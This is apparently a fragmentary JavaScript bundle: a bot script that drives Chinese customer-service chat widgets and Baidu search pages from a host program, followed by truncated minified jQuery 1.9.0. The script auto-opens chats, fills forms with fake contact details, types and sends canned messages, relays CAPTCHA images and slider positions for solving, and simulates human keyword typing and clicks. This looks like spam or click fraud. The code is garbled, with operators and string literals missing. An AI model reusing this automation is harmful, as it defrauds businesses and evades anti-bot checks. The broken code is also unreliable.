if (this.ImgContainer == null)

this.ImgContainer = gel("strictImgCB");

this.isReady = this.InputContainer != null && this.ImgContainer != null;

"FeedBackURL": function () {

window.external.setImgURL(this.ImgContainer.src);

if (popDiv != null && popDiv.style.display != "none" && popDiv.innerText.indexOf("

") > -1)

gel("callLevlChat").click();

if (modalDiv_Chatpreobj != null && modalDiv_Chatpreobj.style.display != "none" && modalDiv_Chatpreobj.innerText.indexOf("

"Capture": VCodeCaptures.KF53,

this.Refresh();

this.Capture.RefreshVCode();

return this.Capture.GetReady() && this.Capture.HasVCode();

if (!this.Exists())

this.Capture.FillIdentRet(identRet);

setTimeout("VCodeHandler.AfterFill()", 1000 * 10);

if (this.Exists())

updateChatState(StateIDs.VCodedIsInvalid);

updateChatState(StateIDs.AllowedBegin);

case CSSTypes.KF53:

this.Capture = VCodeCaptures.KF53;

case CSSTypes.DKB:

this.Capture = VCodeCaptures.DKB;

case CSSTypes.POP800:

this.Capture = VCodeCaptures.POP800;

case CSSTypes.Live800:

this.Capture = VCodeCaptures.Live800;

case CSSTypes.SWT:

this.Capture = VCodeCaptures.SWT;

return (Math.random() * 1000000000).toString().substr(0, 9);

var ctrlRange = document.body.createControlRange();

ctrlRange.addElement(imgEle);

ctrlRange.execCommand("copy");

updateChatState(StateIDs.FoundVCode);

var ctrlRange = doc.body.createControlRange();

flagEle = document.createElement("input");

flagEle.id = "CSSChat_ChatState";

flagEle.type = "hidden";

flagEle.value = "-1";

document.body.appendChild(flagEle);

var chatwordsFrame = document.getElementById("chatwordsFrame");

var servicekindlist = chatwordsFrame.contentWindow.document.getElementById("servicekindlist");

var listCS = servicekindlist.getElementsByTagName("a");

for (var i = 0; i < listCS.length; i  ) {

if (listCS[i].innerText.indexOf("

") > -1) {

listCS[i].children[0].click();

var tipElement = document.getElementById("LoadingTip");

var tipImg = document.getElementById("Loading");

var tipContent, imgURL, hasSender = false;

tipContent = tipElement.innerText;

imgURL = tipImg.getAttribute("src");

if (tipContent.indexOf("

") > -1 || imgURL.indexOf("loaded") > -1) {

var eleSendBtn = document.getElementById("Send");

eleSendBtn.click();

gel("send").click();

gel("talk_label_send").click();

if (VCodeHandler.Exists()) {

VCodeHandler.Found();

if (filterIsWorking && window.check != undefined) {

//window.location = 'chatwin.aspx'   UrlQuery;

if (modalDiv_Chatpreobj && modalDiv_Chatpreobj.style.display != "none") {

modalDiv_Chatpreobj.style.display = 'none';

contentContainer = document.getElementById("FreeTextBox1_editor").contentWindow.document.body;

if (VCodeHandler.Exists()) {

VCodeHandler.Found();

$('.sent_left').get(0).click();

var sliderClassName = ".gt_slider_knob";

var hasSlider = $("#checkCodeDiv").length > 0 && $(sliderClassName).length > 0;

var exp_bgImg = /url\((. ?)\)/;

path1 = exp_bgImg.exec($(".gt_ads").css(styleName))[1];

path2 = exp_bgImg.exec($(".gt_ads_bg").css(styleName))[1];

path1 = path1.replace(exp_symbols, "");

path2 = path2.replace(exp_symbols, "");

var sliderOffset = $(sliderClassName).get(0).getBoundingClientRect();

window.external.foundSlider(path1, path2, sliderOffset.left, sliderOffset.top);

gel("enter").click();

tagName = editor.tagName.toLowerCase();

contentContainer = editor.contentWindow.document.body;

window.WebIM != undefined && window.WebIM.FTB_Send != undefined) {

window.WebIM.FTB_Send();

filterDiv.style.display != "none") {

c = document.getElementById(t_id   i.toString());

switch (c.tagName.toLowerCase()) {

switch (c.getAttribute("type").toLowerCase()) {

c.value = getRContent();

c.value = getRContent();

contentContainer = document.getElementById("texteditor");

if (contentContainer != null && window.SendMsg != undefined) {

window.SendMsg();

if (VCodeHandler.Exists()) {

VCodeHandler.Found();

editorIframe = parentDiv.children[0];

if (editorIframe.tagName.toLowerCase() == "iframe") {

contentContainer = editorIframe.contentWindow.document.body;

sendButton.click();

function with365Web() {

SendMsg();

window.sendMessage();

contentContainer = gel("msg");

window.sendmsg();

return chatContents[getRValue(0, chatContents.length - 1)];

return chatContents[chatContents.length - 1];

sendSuccessed = (baidu.G(ID.EDITOR).contentWindow.document.body.innerText == "");

baidu.G(ID.EDITOR).contentWindow.document.body.innerText = "";

switch (contentContainer.tagName.toLowerCase()) {

sendSuccessed = contentContainer.innerText == "";

contentContainer.innerText = "";

sendSuccessed = contentContainer.value == "";

contentContainer.value = "";

baidu.G(ID.EDITOR).contentWindow.document.body.innerText  = currentChar;

contentContainer.innerText  = currentChar;

contentContainer.value  = currentChar;

updateChatState(StateIDs.Failed);

updateChatState(StateIDs.Chatting);

updateChatState(StateIDs.Completed);

appendText(content.charAt(parseInt(charIndex, 10)));

if (charIndex < content.length) {

case CSSTypes.BDBridge:

case CSSTypes.TQKF:

case CSSTypes.CC:

case CSSTypes.Web365:

with365Web();

case CSSTypes.Talk99:

case CSSTypes.IBangKF:

case CSSTypes.HXT:

case CSSTypes.JianKe:

updateChatState(StateIDs.AllowedBegin);

chatContents = chatContentsToOne.split("|");

var sCount = chatContents.length;

VCodeHandler.SelectVCodeCapture(targetCSSType);

var chatState = parseInt(flagEle.value, 10);

if (chatState == StateIDs.Chatting || onChatting)

flagEle.value = StateIDs.Chatting.toString();

case StateIDs.Chatting:

window.external.chatting();

case StateIDs.Failed:

window.external.chatFailed();

case StateIDs.Completed:

window.external.chatFinished();

case StateIDs.FoundVCode:

window.external.foundVCode();

case StateIDs.VCodedIsInvalid:

window.external.invalidIdentRet();

case StateIDs.AllowedBegin:

window.external.allowedBeginChat();

var eles = document.getElementsByTagName("span");

for (var i = 0; i < eles.length; i  ) {

ele_onclick = ele.getAttribute("onclick");

if (ele.innerText.indexOf("

") > -1 ||

ele.innerText.indexOf("

ele_onclick = ele_onclick.toString();

var matchRet = /to_kf\(. ?\)/.exec(ele_onclick);

if (matchRet != null && matchRet.length > 0) {

entrances.push(function () {

eval(matchRet[0].toString());

entrances.push(function () {

var authCode = iframe.contentWindow.document.getElementById("authCode");

var clientCardForm = iframe.contentWindow.document.getElementById("clientCardForm");

var win = iframe.contentWindow;

"email": getRString(6)   "@163.com",

"msn": getRString(6)   "@msn.com",

win.$("#"   id).val(dict[id]);

win.$("#"   id).trigger("change");

if (win.$("#questionTypeSelect option").length > 1)

win.$("#questionTypeSelect option")[1].setAttribute("selected", "selected");

var eleOffset = iframe.getBoundingClientRect();

var btnSubmit = win.$(".button_blue").get(0);

var btnSubmitOffset = btnSubmit.getBoundingClientRect();

x = eleOffset.left   btnSubmitOffset.left   20;

y = eleOffset.top   btnSubmitOffset.top   10;

window.external.clickOn(x, y);

window.setTimeout("ADSPIRIT_POP800_Func()", 3000);

window.setInterval("contentContainer = gel('inputbox');", 1000);

var dict = { "name": "unKnow", "email": "[email protected]", "mobile": "13233344214", "companyName": "Unknow", "website": "chat10.live800.com", "qq": "99283721", "msn": "[email protected]" };

for (var key in dict) { if (preChatForm[key] != null) preChatForm[key].value = dict[key]; }

if (preChatForm["gender"] != null && preChatForm["gender"].length > 0)

preChatForm["gender"][0].checked = true;

if (popDiv.innerText.indexOf("

window.loadedFlag = true;

UT.popWindow.hidden();

LIM.initTrack();

if (entrances.length > 0) {

var entrance = entrances[getRValue(0, entrances.length - 1)];

var rvalue = function (start, end) { return Math.floor(Math.random() * end   start); }

result  = dict.charAt(rvalue(0, dict.length));

var txtKeyword;

var keywordList;

var keyword;

function fillKeyword(keywords) {

if (keywords == null || keywords == "")

mobileMode = mobileMode = window.location.host.indexOf("m.baidu.com") > -1;

keywords = keywords.replace("[m]","");

var form = document.forms[0];

txtKeyword = form.word;

btnSend = form.ct_1;

txtKeyword = gel("kw1");

if (txtKeyword == null)

txtKeyword = gel("kw");

txtKeyword.value = "";

txtKeyword.focus();

keywordList = keywords.split("|");

if (keywordList.length == 1)

keyword = keywordList[0];

else if (keywordList.length > 1)

keyword = keywordList[getRValue(0, keywordList.length)];

keyword = null;

if (keyword == null || keyword == "")

setTimeout("fillContent('"   keyword   "',0)", getRValue(400, 600));

function fillContent(keyword, charIndex) {

if (keyword == undefined)

txtKeyword.value  = keyword.charAt(charIndex);

if (charIndex < keyword.length) {

setTimeout("fillContent('"   keyword   "',"   charIndex   ")", getRValue(400, 600));

var btnOffset = btnSend.getBoundingClientRect();

var x = btnOffset.left;

var y = btnOffset.top;

x = x   getRValue(2, btnSend.offsetWidth - 2);

y = y   getRValue(2, btnSend.offsetHeight - 2);

window.external.fillKeywordFinished(x, y);

/// <reference path="Common.js"/>

var execCode;

inst.Id = id;

inst.Entrances = new Array();

inst.GetRandEntrance = function () {

if (this.Entrances != null) {

if (this.Entrances.length == 1)

obj = this.Entrances[0];

obj = this.Entrances[getRValue(0, this.Entrances.length - 1)];

inst.Open = function () {

var unknowObj = inst.GetRandEntrance();

unknowObj.click();

inst.Clear = function () {

this.Entrances = new Array();

inst.Add = function (e) {

this.Entrances.push(e);

"Web365": new CSS(8),

var currentCSS = CSSList.BDBridge;

currentCSS.Clear();

var eles = document.all;

for (var i = 0; i < eles.length; i  ) {

eleClassName = ele.className;

if (eleClassName.indexOf("qiao-icon-group-online") > -1 ||

eleClassName.indexOf("qiao-icon-user-online") > -1 ||

eleClassName.indexOf("qiao-invite-accept") > -1 ||

eleClassName.indexOf("bdbridge-group-item") > -1)

currentCSS.Add(ele);

var eleHeadIcon = document.getElementById("bridgehead");

currentCSS.Add(eleHeadIcon);

eleHeadIcon = document.getElementById("qiao-icon-wrap");

if (eleHeadIcon.children.length == 1)

currentCSS.Add(function () {

eleHeadIcon.children[0].click();

else if (eleHeadIcon.children.length == 2)

eleHeadIcon.children[1].click();

var currentCSS = CSSList.KF53;

for (var i = 0; i < eles.length; i  ) {

eleOnclick = ele.getAttribute("onclick");

if (/setIsinvited/.test(eleOnclick)){

currentCSS.Add(function () {

ele.click();

var links = document.getElementsByTagName("a");

for (var i = 0; i < links.length; i  ) {

if (/53kf. ?webCompany/.test(link.href))

link.click();

var currentCSS = CSSList.SWT;

if (window.openZoosUrl != undefined)

currentCSS.Add(openZoosUrl);

for(var i =0;i< document.all.length;i  ) {

var ele = document.all[i];

var href = ele.getAttribute("href");

if(href && href.indexOf("ala.zoossoft.com/LR/Chatpre") > -1)

currentCSS.Add(function () {

ele.click();

var currentCSS = CSSList.POP800;

var exp_entrance1 = /P8\.startChat\(. ?\)/;

var exp_entrance2 = /P8\.startGroupChat\(. ?\)/;

var entrance_container = document.getElementById("POP800_PANEL_DIV");

matchRet = exp_entrance1.exec(entrance_container.innerHTML);

if (matchRet != null && matchRet.length > 0)

currentCSS.Add(

eval(matchRet[0].toString());

matchRet = exp_entrance2.exec(entrance_container.innerHTML);

if (matchRet != null && matchRet.length > 0) {

eval(execCode);

entrance_container = document.getElementById("POP800_INIT_DIV");

var currentCSS = CSSList.Live800;

for (var i = 0; i < frameList.length; i  ) {

var children = frame.contentWindow.document.getElementsByTagName("frame");

var entrance = frame.contentWindow.globalInviteWindow;

return function () { entrance.accept(); };

else if (children != null && children.length > 0)

if (window.globalInviteWindow != null && window.globalInviteWindow.accept != null)

window.globalInviteWindow.accept();

entrance = getEntrance(document.getElementsByTagName("frame"));

currentCSS.Add(entrance);

var live800iconlink = document.getElementById("live800iconlink");

live800iconlink.click();

var currentCSS = CSSList.TQKF;

if (window.TQKF != undefined) {

matchRet = /TQKF\.floater\.OpenChatWin\(. ?\)/.exec(entrance_container.innerHTML);

if (matchRet != null && matchRet.length > 0) {

var execCode = matchRet[0].toString();

currentCSS.Add(function () {

tq_kefu_normal_container.children[0].click();

var currentCSS = CSSList.DKB;

if (window.Detector != undefined &&

window.Detector.floatclick != undefined)

currentCSS.Add(function () {

window.Detector.floatclick();

var currentCSS = CSSList.CC;

if (entrance_container && entrance_container.length> 0) {

entrance_container[getRValue(0, entrance_container.length - 1)].click();

window.external.logError("CC:"   entrance_container.length);

entrance_container[getRValue(0, entrance_container.length - 1)].click();

function get365Web() {

var currentCSS = CSSList.Web365;

var eles = document.getElementsByTagName("a");

func_onclick = ele.getAttribute("onclick");

var matRet = /OnlineSupport_365webcall. ?openGroupChatWin(. ?);/.exec(func_onclick.toString());

if (matRet != null && matRet.length > 0) {

var execCode = matRet[0];

var currentCSS = CSSList.Talk99;

for (var i = 0; i < eleIDs.length; i  ) {

ele = document.getElementById(eleIDs[i]);

ele.click();

window.setTimeout("talk99_func()",6000);

var offset = ele.getBoundingClientRect();

window.external.clickOn(offset.left   x, offset.top   y);

var currentCSS = CSSList.IBangKF;

if (window.ib_wopen != undefined) {

window.ib_wopen();

var currentCSS = CSSList.JianKe;

if (window.openkfWin != undefined) {

window.openkfWin(2);

var currentCSS = CSSList.HXT;

if (window.icon != undefined && window.icon.win_open != undefined) {

window.icon.win_open();

var getCSSEntranceFuncs = [get53KF, getBDBridge, getSWT, getPOP800, getLive800, getTQKF, getDKB, getCC, get365Web, getTalk99, getIBangKF, getHXT,getJianKe], func = null;

for (var i = 0; i < getCSSEntranceFuncs.length; i  ) {

for (var i = 0; i < othersGetCSSEntranceFuncs.length; i  ) {

if (currentCSS.Entrances != null && currentCSS.Entrances.length > 0)

hasEntrance_CSSList.push(currentCSS);

if (hasEntrance_CSSList.length == 1)

else if (hasEntrance_CSSList.length > 1)

targetCSS = hasEntrance_CSSList[getRValue(0, hasEntrance_CSSList.length - 1)];

sendBack(isFound, TargetCSS.Id);

window.external.findCSSEntranceFinished(isFound, CSSId == null ? "-1" : CSSId.toString());

TargetCSS.Open();

var scripts = document.getElementsByTagName("script");

for (var i = 0; i < scripts.length; i  ) {

if (/53kf/.test(scripts[i].src)) {

if(window.brokeFilter2)

var hasFilter = document.body.innerText.indexOf(filterTitle) > -1;

var eles = document.all;

if (ele.tagName == "BODY")

if (ele.innerHTML.indexOf(filterTitle) > -1 && ele.innerHTML.indexOf(filterTitle) < 5) {

window.location.href = document.URL;

submitBtnEle.click();

for (var i = 0; i < arr.length; i  ) {

contentType = parseInt(arr[i].contentType, 10);

$ele = $(arr[i].token);

if ($ele.length == 0) {

invalidTokens.push(arr[i].token);

domEle = $ele.get(0);

return /city|area|province/.test(JSONStr) ? contentDict[contentType.toString()] : (contentDict["205"].toString()   contentDict[contentType.toString()]);

autoSelect(domEle,arr[i].token);

$ele.val($ele.val()   getAddress());

$ele.val(contentDict[contentType.toString()]);

feedBack(vcodeImgEle.src);

this.setInterval("autoSubmit()", "1000");

var tagName = ele.tagName.toLowerCase();

index = getRValue(ele.children.length);

if (index >= ele.children.length)

index = ele.children.length - 1;

ele.children[index].setAttribute("selected", "selected");

if(ele.onchange != null)

ignoreError(function(){ ele.onchange();});

ignoreError(function(){ $(ele).trigger("change"); });

index = getRValue($radios.length);

ele = $radios.get(index);

ele.checked = true;

if(ele.onclick != null)

ignoreError(function(){ ele.click();});

ignoreError(function(){ $(ele).trigger("click");});

window.external.setImgURL(src);

window.external.foundVCode();

vcodeInputEle.value = result;

return Math.floor(Math.random() * max   min);

var _forms = document.getElementsByTagName("form");

for(var i=0;i< _forms.length;i  )

_forms[i].setAttribute("target","");

/// <reference path="jquery.mousewheel.min.js" />

/*! jQuery v1.9.0 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license */(function(e,t){"use strict";function n(e){var t=e.length,n=st.type(e);return st.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}function r(e){var t=Tt[e]={};return st.each(e.match(lt)||[],function(e,n){t[n]=!0}),t}function i(e,n,r,i){if(st.acceptData(e)){var o,a,s=st.expando,u="string"==typeof n,l=e.nodeType,c=l?st.cache:e,f=l?e[s]:e[s]&&s;if(f&&c[f]&&(i||c[f].data)||!u||r!==t)return f||(l?e[s]=f=K.pop()||st.guid  :f=s),c[f]||(c[f]={},l||(c[f].toJSON=st.noop)),("object"==typeof n||"function"==typeof n)&&(i?c[f]=st.extend(c[f],n):c[f].data=st.extend(c[f].data,n)),o=c[f],i||(o.data||(o.data={}),o=o.data),r!==t&&(o[st.camelCase(n)]=r),u?(a=o[n],null==a&&(a=o[st.camelCase(n)])):a=o,a}}function o(e,t,n){if(st.acceptData(e)){var r,i,o,a=e.nodeType,u=a?st.cache:e,l=a?e[st.expando]:st.expando;if(u[l]){if(t&&(r=n?u[l]:u[l].data)){st.isArray(t)?t=t.concat(st.map(t,st.camelCase)):t in r?t=[t]:(t=st.camelCase(t),t=t in r?[t]:t.split(" "));for(i=0,o=t.length;o>i;i  )delete r[t[i]];if(!(n?s:st.isEmptyObject)(r))return}(n||(delete u[l].data,s(u[l])))&&(a?st.cleanData([e],!0):st.support.deleteExpando||u!=u.window?delete u[l]:u[l]=null)}}}function a(e,n,r){if(r===t&&1===e.nodeType){var i="data-" n.replace(Nt,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null: r ""===r? r:wt.test(r)?st.parseJSON(r):r}catch(o){}st.data(e,n,r)}else r=t}return r}function s(e){var t;for(t in e)if(("data"!==t||!st.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}function u(){return!0}function l(){return!1}function c(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}function f(e,t,n){if(t=t||0,st.isFunction(t))return st.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return st.grep(e,function(e){return e===t===n});if("string"==typeof t){var r=st.grep(e,function(e){return 1===e.nodeType});if(Wt.test(t))return st.filter(t,r,!n);t=st.filter(t,r)}return st.grep(e,function(e){return st.inArray(e,t)>=0===n})}function p(e){var t=zt.split("|"),n=e.createDocumentFragment();if(n.createElement)for(;t.length;)n.createElement(t.pop());return n}function d(e,t){return e.getElementsByTagName(t)[0]||e.appendChild(e.ownerDocument.createElement(t))}function h(e){var t=e.getAttributeNode("type");return e.type=(t&&t.specified) "/" e.type,e}function g(e){var t=nn.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function m(e,t){for(var n,r=0;null!=(n=e[r]);r  )st._data(n,"globalEval",!t||st._data(t[r],"globalEval"))}function y(e,t){if(1===t.nodeType&&st.hasData(e)){var n,r,i,o=st._data(e),a=st._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r  )st.event.add(t,n,s[n][r])}a.data&&(a.data=st.extend({},a.data))}}function v(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!st.support.noCloneEvent&&t[st.expando]){r=st._data(t);for(i in r.events)st.removeEvent(t,i,r.handle);t.removeAttribute(st.expando)}"script"===n&&t.text!==e.text?(h(t).text=e.text,g(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),st.support.html5Clone&&e.innerHTML&&!st.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Zt.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}function b(e,n){var r,i,o=0,a=e.getElementsByTagName!==t?e.getElementsByTagName(n||"*"):e.querySelectorAll!==t?e.querySelectorAll(n||"*"):t;if(!a)for(a=[],r=e.childNodes||e;null!=(i=r[o]);o  )!n||st.nodeName(i,n)?a.push(i):st.merge(a,b(i,n));return n===t||n&&st.nodeName(e,n)?st.merge([e],a):a}function x(e){Zt.test(e.type)&&(e.defaultChecked=e.checked)}function T(e,t){if(t in e)return t;for(var n=t.charAt(0).toUpperCase() t.slice(1),r=t,i=Nn.length;i--;)if(t=Nn[i] n,t in e)return t;return r}function w(e,t){return e=t||e,"none"===st.css(e,"display")||!st.contains(e.ownerDocument,e)}function N(e,t){for(var n,r=[],i=0,o=e.length;o>i;i  )n=e[i],n.style&&(r[i]=st._data(n,"olddisplay"),t?(r[i]||"none"!==n.style.display||(n.style.display=""),""===n.style.display&&w(n)&&(r[i]=st._data(n,"olddisplay",S(n.nodeName)))):r[i]||w(n)||st._data(n,"olddisplay",st.css(n,"display")));for(i=0;o>i;i  )n=e[i],n.style&&(t&&"none"!==n.style.display&&""!==n.style.display||(n.style.display=t?r[i]||"":"none"));return e}function C(e,t,n){var r=mn.exec(t);return r?Math.max(0,r[1]-(n||0)) (r[2]||"px"):t}function k(e,t,n,r,i){for(var o=n===(r?"border":"content")?4:"width"===t?1:0,a=0;4>o;o =2)"margin"===n&&(a =st.css(e,n wn[o],!0,i)),r?("content"===n&&(a-=st.css(e,"padding" wn[o],!0,i)),"margin"!==n&&(a-=st.css(e,"border" wn[o] "Width",!0,i))):(a =st.css(e,"padding" wn[o],!0,i),"padding"!==n&&(a =st.css(e,"border" wn[o] "Width",!0,i)));return a}function E(e,t,n){var r=!0,i="width"===t?e.offsetWidth:e.offsetHeight,o=ln(e),a=st.support.boxSizing&&"border-box"===st.css(e,"boxSizing",!1,o);if(0>=i||null==i){if(i=un(e,t,o),(0>i||null==i)&&(i=e.style[t]),yn.test(i))return i;r=a&&(st.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i k(e,t,n||(a?"border":"content"),r,o) "px"}function S(e){var t=V,n=bn[e];return n||(n=A(e,t),"none"!==n&&n||(cn=(cn||st("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(t.documentElement),t=(cn[0].contentWindow||cn[0].contentDocument).document,t.write("<!doctype html><html><body>"),t.close(),n=A(e,t),cn.detach()),bn[e]=n),n}function A(e,t){var n=st(t.createElement(e)).appendTo(t.body),r=st.css(n[0],"display");return n.remove(),r}function j(e,t,n,r){var i;if(st.isArray(t))st.each(t,function(t,i){n||kn.test(e)?r(e,i):j(e "[" ("object"==typeof i?t:"") "]",i,n,r)});else if(n||"object"!==st.type(t))r(e,t);else for(i in t)j(e "[" i "]",t[i],n,r)}function D(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(lt)||[];if(st.isFunction(n))for(;r=o[i  ];)" "===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function L(e,n,r,i){function o(u){var l;return a[u]=!0,st.each(e[u]||[],function(e,u){var c=u(n,r,i);return"string"!=typeof c||s||a[c]?s?!(l=c):t:(n.dataTypes.unshift(c),o(c),!1)}),l}var a={},s=e===$n;return o(n.dataTypes[0])||!a["*"]&&o("*")}function H(e,n){var r,i,o=st.ajaxSettings.flatOptions||{};for(r in n)n[r]!==t&&((o[r]?e:i||(i={}))[r]=n[r]);return i&&st.extend(!0,e,i),e}function M(e,n,r){var i,o,a,s,u=e.contents,l=e.dataTypes,c=e.responseFields;for(o in c)o in r&&(n[c[o]]=r[o]);for(;"*"===l[0];)l.shift(),i===t&&(i=e.mimeType||n.getResponseHeader("Content-Type"));if(i)for(o in u)if(u[o]&&u[o].test(i)){l.unshift(o);break}if(l[0]in r)a=l[0];else{for(o in r){if(!l[0]||e.converters[o " " l[0]]){a=o;break}s||(s=o)}a=a||s}return a?(a!==l[0]&&l.unshift(a),r[a]):t}function q(e,t){var n,r,i,o,a={},s=0,u=e.dataTypes.slice(),l=u[0];if(e.dataFilter&&(t=e.dataFilter(t,e.dataType)),u[1])for(n in e.converters)a[n.toLowerCase()]=e.converters[n];for(;i=u[  s];)if("*"!==i){if("*"!==l&&l!==i){if(n=a[l " " i]||a["* " i],!n)for(r in a)if(o=r.split(" "),o[1]===i&&(n=a[l " " o[0]]||a["* " o[0]])){n===!0?n=a[r]:a[r]!==!0&&(i=o[0],u.splice(s--,0,i));break}if(n!==!0)if(n&&e["throws"])t=n(t);else try{t=n(t)}catch(c){return{state:"parsererror",error:n?c:"No conversion from " l " to " i}}}l=i}return{state:"success",data:t}}function _(){try{return new e.XMLHttpRequest}catch(t){}}function F(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}function O(){return setTimeout(function(){Qn=t}),Qn=st.now()}function B(e,t){st.each(t,function(t,n){for(var r=(rr[t]||[]).concat(rr["*"]),i=0,o=r.length;o>i;i  )if(r[i].call(e,t,n))return})}function P(e,t,n){var r,i,o=0,a=nr.length,s=st.Deferred().always(function(){delete u.elem}),u=function(){if(i)return!1;for(var t=Qn||O(),n=Math.max(0,l.startTime l.duration-t),r=n/l.duration||0,o=1-r,a=0,u=l.tweens.length;u>a;a  )l.tweens[a].run(o);return s.notifyWith(e,[l,o,n]),1>o&&u?n:(s.resolveWith(e,[l]),!1)},l=s.promise({elem:e,props:st.extend({},t),opts:st.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:Qn||O(),duration:n.duration,tweens:[],createTween:function(t,n){var r=st.Tween(e,l.opts,t,n,l.opts.specialEasing[t]||l.opts.easing);return l.tweens.push(r),r},stop:function(t){var n=0,r=t?l.tweens.length:0;if(i)return this;for(i=!0;r>n;n  )l.tweens[n].run(1);return t?s.resolveWith(e,[l,t]):s.rejectWith(e,[l,t]),this}}),c=l.props;for(R(c,l.opts.specialEasing);a>o;o  )if(r=nr[o].call(l,e,c,l.opts))return r;return B(l,c),st.isFunction(l.opts.start)&&l.opts.start.call(e,l),st.fx.timer(st.extend(u,{elem:e,anim:l,queue:l.opts.queue})),l.progress(l.opts.progress).done(l.opts.done,l.opts.complete).fail(l.opts.fail).always(l.opts.always)}function R(e,t){var n,r,i,o,a;for(n in e)if(r=st.camelCase(n),i=t[r],o=e[n],st.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),a=st.cssHooks[r],a&&"expand"in a){o=a.expand(o),delete e[r];for(n in o)n in e||(e[n]=o[n],t[n]=i)}else t[r]=i}function W(e,t,n){var r,i,o,a,s,u,l,c,f,p=this,d=e.style,h={},g=[],m=e.nodeType&&w(e);n.queue||(c=st._queueHooks(e,"fx"),null==c.unqueued&&(c.unqueued=0,f=c.empty.fire,c.empty.fire=function(){c.unqueued||f()}),c.unqueued  ,p.always(function(){p.always(function(){c.unqueued--,st.queue(e,"fx").length||c.empty.fire()})})),1===e.nodeType&&("height"in t||"width"in t)&&(n.overflow=[d.overflow,d.overflowX,d.overflowY],"inline"===st.css(e,"display")&&"none"===st.css(e,"float")&&(st.support.inlineBlockNeedsLayout&&"inline"!==S(e.nodeName)?d.zoom=1:d.display="inline-block")),n.overflow&&(d.overflow="hidden",st.support.shrinkWrapBlocks||p.done(function(){d.overflow=n.overflow[0],d.overflowX=n.overflow[1],d.overflowY=n.overflow[2]}));for(r in t)if(o=t[r],Zn.exec(o)){if(delete t[r],u=u||"toggle"===o,o===(m?"hide":"show"))continue;g.push(r)}if(a=g.length){s=st._data(e,"fxshow")||st._data(e,"fxshow",{}),"hidden"in s&&(m=s.hidden),u&&(s.hidden=!m),m?st(e).show():p.done(function(){st(e).hide()}),p.done(function(){var t;st._removeData(e,"fxshow");for(t in h)st.style(e,t,h[t])});for(r=0;a>r;r  )i=g[r],l=p.createTween(i,m?s[i]:0),h[i]=s[i]||st.style(e,i),i in s||(s[i]=l.start,m&&(l.end=l.start,l.start="width"===i||"height"===i?1:0))}}function $(e,t,n,r,i){return new $.prototype.init(e,t,n,r,i)}function I(e,t){var n,r={height:e},i=0;for(t=t?1:0;4>i;i =2-t)n=wn[i],r["margin" n]=r["padding" n]=e;return t&&(r.opacity=r.width=e),r}function z(e){return st.isWindow(e)?e:9===e.nodeType?e.defaultView||e.parentWindow:!1}var X,U,V=e.document,Y=e.location,J=e.jQuery,G=e.$,Q={},K=[],Z="1.9.0",et=K.concat,tt=K.push,nt=K.slice,rt=K.indexOf,it=Q.toString,ot=Q.hasOwnProperty,at=Z.trim,st=function(e,t){return new st.fn.init(e,t,X)},ut=/[ -]?(?:\d*\.|)\d (?:[eE][ -]?\d |)/.source,lt=/\S /g,ct=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,ft=/^(?:(<[\w\W] >)[^>]*|#([\w-]*))$/,pt=/^<(\w )\s*\/?>(?:<\/\1>|)$/,dt=/^[\],:{}\s]*$/,ht=/(?:^|:|,)(?:\s*\[) /g,gt=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,mt=/"[^"\\\r\n]*"|true|false|null|-?(?:\d \.|)\d (?:[eE][ -]?\d |)/g,yt=/^-ms-/,vt=/-([\da-z])/gi,bt=function(e,t){return t.toUpperCase()},xt=function(){V.addEventListener?(V.removeEventListener("DOMContentLoaded",xt,!1),st.ready()):"complete"===V.readyState&&(V.detachEvent("onreadystatechange",xt),st.ready())};st.fn=st.prototype={jquery:Z,constructor:st,init:function(e,n,r){var i,o;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:ft.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof st?n[0]:n,st.merge(this,st.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:V,!0)),pt.test(i[1])&&st.isPlainObject(n))for(i in n)st.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(o=V.getElementById(i[2]),o&&o.parentNode){if(o.id!==i[2])return r.find(e);this.length=1,this[0]=o}return this.context=V,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):st.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),st.makeArray(e,this))},selector:"",length:0,size:function(){return this.length},toArray:function(){return nt.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length e]:this[e]},pushStack:function(e){var t=st.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return st.each(this,e,t)},ready:function(e){return st.ready.promise().done(e),this},slice:function(){return this.pushStack(nt.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return 